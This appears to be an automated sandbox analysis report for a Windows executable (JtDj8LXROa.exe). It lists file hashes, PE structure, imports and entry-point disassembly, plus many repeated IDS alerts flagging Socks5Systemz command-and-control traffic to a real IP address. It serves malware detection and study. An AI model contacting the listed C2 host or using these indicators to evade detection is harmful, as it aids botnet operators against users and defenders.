                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.998404898885222
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 97.43%
                                                                                • Win32 Executable PowerBASIC/Win 9.x (148305/79) 1.44%
                                                                                • Inno Setup installer (109748/4) 1.07%
                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                File name:JtDj8LXROa.exe
                                                                                File size:3'981'762 bytes
                                                                                MD5:d05072998fa8197eea94c4d66dfb89f6
                                                                                SHA1:86df4d971ff887f27e0138e146fb89ad1a3e6db0
                                                                                SHA256:5665d60c2745ec2f9f07446993d491d5a26360a873095ec5df711947ac854f68
                                                                                SHA512:863c5c52149111c469cc90e4f1e713e493e4f43b6c33dfc7357793e46b007e338df87d17083649adda3c2936ce8a5a43b21965ebde9f77bc14d2f1116422e833
                                                                                SSDEEP:98304:xd2SsFX3slcQEgm3wufQI0qMFKxlpI+sQbpmBeE:DosiQAQdqMFKx1pbpmBeE
                                                                                TLSH:410633F2D8F07A34CA76A8743FE72715D3E97941987881042BDCCC1E1B7938AA53671A
                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                Icon Hash:2d2e3797b32b2b99
                                                                                Entrypoint:0x4097f0
                                                                                Entrypoint Section:CODE
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                DLL Characteristics:
                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:1
                                                                                OS Version Minor:0
                                                                                File Version Major:1
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:1
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:80417b621299e3e1de617305557a3c68
                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                add esp, FFFFFFCCh
                                                                                push ebx
                                                                                push esi
                                                                                push edi
                                                                                xor eax, eax
                                                                                mov dword ptr [ebp-10h], eax
                                                                                mov dword ptr [ebp-24h], eax
                                                                                call 00007F37C87FFEEBh
                                                                                call 00007F37C88010F2h
                                                                                call 00007F37C8803315h
                                                                                call 00007F37C880335Ch
                                                                                call 00007F37C8805953h
                                                                                call 00007F37C8805ABAh
                                                                                xor eax, eax
                                                                                push ebp
                                                                                push 00409E9Ah
                                                                                push dword ptr fs:[eax]
                                                                                mov dword ptr fs:[eax], esp
                                                                                xor edx, edx
                                                                                push ebp
                                                                                push 00409E50h
                                                                                push dword ptr fs:[edx]
                                                                                mov dword ptr fs:[edx], esp
                                                                                mov eax, dword ptr [0040B014h]
                                                                                call 00007F37C88064B0h
                                                                                call 00007F37C880606Fh
                                                                                lea edx, dword ptr [ebp-10h]
                                                                                xor eax, eax
                                                                                call 00007F37C88037D5h
                                                                                mov edx, dword ptr [ebp-10h]
                                                                                mov eax, 0040BDD4h
                                                                                call 00007F37C87FFF9Ch
                                                                                push 00000002h
                                                                                push 00000000h
                                                                                push 00000001h
                                                                                mov ecx, dword ptr [0040BDD4h]
                                                                                mov dl, 01h
                                                                                mov eax, 004070D4h
                                                                                call 00007F37C8803EBCh
                                                                                mov dword ptr [0040BDD8h], eax
                                                                                xor edx, edx
                                                                                push ebp
                                                                                push 00409E2Eh
                                                                                push dword ptr fs:[edx]
                                                                                mov dword ptr fs:[edx], esp
                                                                                call 00007F37C8806520h
                                                                                mov dword ptr [0040BDE0h], eax
                                                                                mov eax, dword ptr [0040BDE0h]
                                                                                cmp dword ptr [eax+0Ch], 01h
                                                                                jne 00007F37C880665Ah
                                                                                mov eax, dword ptr [0040BDE0h]
                                                                                mov edx, 00000028h
                                                                                call 00007F37C88043B1h
                                                                                mov edx, dword ptr [0040BDE0h]
                                                                                cmp eax, dword ptr [edx+00h]
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc0000x942.idata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x27f0.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xe0000x18.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                CODE0x10000x8f140x900019aec1c1a4ef2fb9fe30b219ab07ddb2False0.6161566840277778data6.576229301468958IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                DATA0xa0000x2480x4006344b5e22b5b2675be150744885e2671False0.30859375data2.724170008025107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                BSS0xb0000xe340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .idata0xc0000x9420xa00563cb4ae07a81b0403d850851e368293False0.410546875data4.420093430397456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .tls0xd0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rdata0xe0000x180x200d293bf8d4ebe9826d58e1d27c25fe4b6False0.052734375data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                .reloc0xf0000x8800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x100000x30000x28003a296536eab8c162cb468051bb2d47dcFalse0.33388671875data4.475752000496117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x103540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                RT_ICON0x1047c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                RT_ICON0x109e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                RT_ICON0x10ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                RT_STRING0x115740x2f2data0.35543766578249336
                                                                                RT_STRING0x118680x30cdata0.3871794871794872
                                                                                RT_STRING0x11b740x2cedata0.42618384401114207
                                                                                RT_STRING0x11e440x68data0.75
                                                                                RT_STRING0x11eac0xb4data0.6277777777777778
                                                                                RT_STRING0x11f600xaedata0.5344827586206896
                                                                                RT_RCDATA0x120100x2cdata1.2045454545454546
                                                                                RT_GROUP_ICON0x1203c0x3edataEnglishUnited States0.8387096774193549
                                                                                RT_VERSION0x1207c0x3fcdataEnglishUnited States0.31862745098039214
                                                                                RT_MANIFEST0x124780x377XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.46110484780157834
                                                                                DLLImport
                                                                                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                user32.dllMessageBoxA
                                                                                oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                comctl32.dllInitCommonControls
                                                                                advapi32.dllAdjustTokenPrivileges
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                DutchNetherlands
                                                                                EnglishUnited States
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-10-08T22:39:01.392614+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449753185.208.158.24880TCP
                                                                                2024-10-08T22:39:01.392614+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449753185.208.158.24880TCP
                                                                                2024-10-08T22:39:04.845228+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449753185.208.158.24880TCP
                                                                                2024-10-08T22:39:04.845228+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449753185.208.158.24880TCP
                                                                                2024-10-08T22:39:05.898869+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449780185.208.158.24880TCP
                                                                                2024-10-08T22:39:05.898869+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449780185.208.158.24880TCP
                                                                                2024-10-08T22:39:06.296631+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449780185.208.158.24880TCP
                                                                                2024-10-08T22:39:06.296631+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449780185.208.158.24880TCP
                                                                                2024-10-08T22:39:07.154488+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449789185.208.158.24880TCP
                                                                                2024-10-08T22:39:07.154488+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449789185.208.158.24880TCP
                                                                                2024-10-08T22:39:08.038059+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449795185.208.158.24880TCP
                                                                                2024-10-08T22:39:08.038059+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449795185.208.158.24880TCP
                                                                                2024-10-08T22:39:08.886528+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449801185.208.158.24880TCP
                                                                                2024-10-08T22:39:08.886528+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449801185.208.158.24880TCP
                                                                                2024-10-08T22:39:09.275517+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449801185.208.158.24880TCP
                                                                                2024-10-08T22:39:09.275517+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449801185.208.158.24880TCP
                                                                                2024-10-08T22:39:09.632316+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449801185.208.158.24880TCP
                                                                                2024-10-08T22:39:09.632316+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449801185.208.158.24880TCP
                                                                                2024-10-08T22:39:10.469030+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449812185.208.158.24880TCP
                                                                                2024-10-08T22:39:10.469030+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449812185.208.158.24880TCP
                                                                                2024-10-08T22:39:11.593035+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449817185.208.158.24880TCP
                                                                                2024-10-08T22:39:11.593035+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449817185.208.158.24880TCP
                                                                                2024-10-08T22:39:12.418618+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449825185.208.158.24880TCP
                                                                                2024-10-08T22:39:12.418618+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449825185.208.158.24880TCP
                                                                                2024-10-08T22:39:13.358319+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449830185.208.158.24880TCP
                                                                                2024-10-08T22:39:13.358319+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449830185.208.158.24880TCP
                                                                                2024-10-08T22:39:14.294482+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449837185.208.158.24880TCP
                                                                                2024-10-08T22:39:14.294482+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449837185.208.158.24880TCP
                                                                                2024-10-08T22:39:15.144505+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449841185.208.158.24880TCP
                                                                                2024-10-08T22:39:15.144505+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449841185.208.158.24880TCP
                                                                                2024-10-08T22:39:16.031506+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449848185.208.158.24880TCP
                                                                                2024-10-08T22:39:16.031506+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449848185.208.158.24880TCP
                                                                                2024-10-08T22:39:16.878553+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449854185.208.158.24880TCP
                                                                                2024-10-08T22:39:16.878553+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449854185.208.158.24880TCP
                                                                                2024-10-08T22:39:17.772623+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449861185.208.158.24880TCP
                                                                                2024-10-08T22:39:17.772623+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449861185.208.158.24880TCP
                                                                                2024-10-08T22:39:18.590338+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449869185.208.158.24880TCP
                                                                                2024-10-08T22:39:18.590338+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449869185.208.158.24880TCP
                                                                                2024-10-08T22:39:19.684024+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449875185.208.158.24880TCP
                                                                                2024-10-08T22:39:19.684024+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449875185.208.158.24880TCP
                                                                                2024-10-08T22:39:20.037271+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449875185.208.158.24880TCP
                                                                                2024-10-08T22:39:20.037271+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449875185.208.158.24880TCP
                                                                                2024-10-08T22:39:20.864506+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449884185.208.158.24880TCP
                                                                                2024-10-08T22:39:20.864506+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449884185.208.158.24880TCP
                                                                                2024-10-08T22:39:21.901292+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449891185.208.158.24880TCP
                                                                                2024-10-08T22:39:21.901292+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449891185.208.158.24880TCP
                                                                                2024-10-08T22:39:22.278637+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449891185.208.158.24880TCP
                                                                                2024-10-08T22:39:22.278637+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449891185.208.158.24880TCP
                                                                                2024-10-08T22:39:23.668745+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449898185.208.158.24880TCP
                                                                                2024-10-08T22:39:23.668745+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449898185.208.158.24880TCP
                                                                                2024-10-08T22:39:24.514307+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449904185.208.158.24880TCP
                                                                                2024-10-08T22:39:24.514307+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449904185.208.158.24880TCP
                                                                                2024-10-08T22:39:25.358260+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449910185.208.158.24880TCP
                                                                                2024-10-08T22:39:25.358260+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449910185.208.158.24880TCP
                                                                                2024-10-08T22:39:26.198575+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449916185.208.158.24880TCP
                                                                                2024-10-08T22:39:26.198575+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449916185.208.158.24880TCP
                                                                                2024-10-08T22:39:26.556915+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449916185.208.158.24880TCP
                                                                                2024-10-08T22:39:26.556915+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449916185.208.158.24880TCP
                                                                                2024-10-08T22:39:26.917475+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449916185.208.158.24880TCP
                                                                                2024-10-08T22:39:26.917475+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449916185.208.158.24880TCP
                                                                                2024-10-08T22:39:27.286587+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449916185.208.158.24880TCP
                                                                                2024-10-08T22:39:27.286587+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449916185.208.158.24880TCP
                                                                                2024-10-08T22:39:28.104477+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449925185.208.158.24880TCP
                                                                                2024-10-08T22:39:28.104477+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449925185.208.158.24880TCP
                                                                                2024-10-08T22:39:28.460290+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449925185.208.158.24880TCP
                                                                                2024-10-08T22:39:28.460290+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449925185.208.158.24880TCP
                                                                                2024-10-08T22:39:29.328227+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449934185.208.158.24880TCP
                                                                                2024-10-08T22:39:29.328227+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449934185.208.158.24880TCP
                                                                                2024-10-08T22:39:30.188237+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449941185.208.158.24880TCP
                                                                                2024-10-08T22:39:30.188237+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449941185.208.158.24880TCP
                                                                                2024-10-08T22:39:31.032044+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449947185.208.158.24880TCP
                                                                                2024-10-08T22:39:31.032044+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449947185.208.158.24880TCP
                                                                                2024-10-08T22:39:31.912424+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449953185.208.158.24880TCP
                                                                                2024-10-08T22:39:31.912424+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449953185.208.158.24880TCP
                                                                                2024-10-08T22:39:32.771473+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449959185.208.158.24880TCP
                                                                                2024-10-08T22:39:32.771473+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449959185.208.158.24880TCP
                                                                                2024-10-08T22:39:33.603640+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449966185.208.158.24880TCP
                                                                                2024-10-08T22:39:33.603640+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449966185.208.158.24880TCP
                                                                                2024-10-08T22:39:34.189446+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449966185.208.158.24880TCP
                                                                                2024-10-08T22:39:34.189446+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449966185.208.158.24880TCP
                                                                                2024-10-08T22:39:35.050666+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449976185.208.158.24880TCP
                                                                                2024-10-08T22:39:35.050666+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449976185.208.158.24880TCP
                                                                                2024-10-08T22:39:35.915120+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449982185.208.158.24880TCP
                                                                                2024-10-08T22:39:35.915120+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449982185.208.158.24880TCP
                                                                                2024-10-08T22:39:36.294245+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449982185.208.158.24880TCP
                                                                                2024-10-08T22:39:36.294245+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449982185.208.158.24880TCP
                                                                                2024-10-08T22:39:36.692350+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449982185.208.158.24880TCP
                                                                                2024-10-08T22:39:36.692350+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449982185.208.158.24880TCP
                                                                                2024-10-08T22:39:37.567701+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449990185.208.158.24880TCP
                                                                                2024-10-08T22:39:37.567701+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449990185.208.158.24880TCP
                                                                                2024-10-08T22:39:38.404644+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449995185.208.158.24880TCP
                                                                                2024-10-08T22:39:38.404644+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449995185.208.158.24880TCP
                                                                                2024-10-08T22:39:39.292277+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450002185.208.158.24880TCP
                                                                                2024-10-08T22:39:39.292277+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450002185.208.158.24880TCP
                                                                                2024-10-08T22:39:39.652671+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450002185.208.158.24880TCP
                                                                                2024-10-08T22:39:39.652671+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450002185.208.158.24880TCP
                                                                                2024-10-08T22:39:40.040729+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450002185.208.158.24880TCP
                                                                                2024-10-08T22:39:40.040729+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450002185.208.158.24880TCP
                                                                                2024-10-08T22:39:40.407531+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450002185.208.158.24880TCP
                                                                                2024-10-08T22:39:40.407531+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450002185.208.158.24880TCP
                                                                                2024-10-08T22:39:41.253814+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450014185.208.158.24880TCP
                                                                                2024-10-08T22:39:41.253814+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450014185.208.158.24880TCP
                                                                                2024-10-08T22:39:42.069446+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450021185.208.158.24880TCP
                                                                                2024-10-08T22:39:42.069446+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450021185.208.158.24880TCP
                                                                                2024-10-08T22:39:42.913938+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450027185.208.158.24880TCP
                                                                                2024-10-08T22:39:42.913938+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450027185.208.158.24880TCP
                                                                                2024-10-08T22:39:44.385772+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450032185.208.158.24880TCP
                                                                                2024-10-08T22:39:44.385772+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450032185.208.158.24880TCP
                                                                                2024-10-08T22:39:44.746210+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450032185.208.158.24880TCP
                                                                                2024-10-08T22:39:44.746210+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450032185.208.158.24880TCP
                                                                                2024-10-08T22:39:45.108008+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450032185.208.158.24880TCP
                                                                                2024-10-08T22:39:45.108008+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450032185.208.158.24880TCP
                                                                                2024-10-08T22:39:45.934481+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450042185.208.158.24880TCP
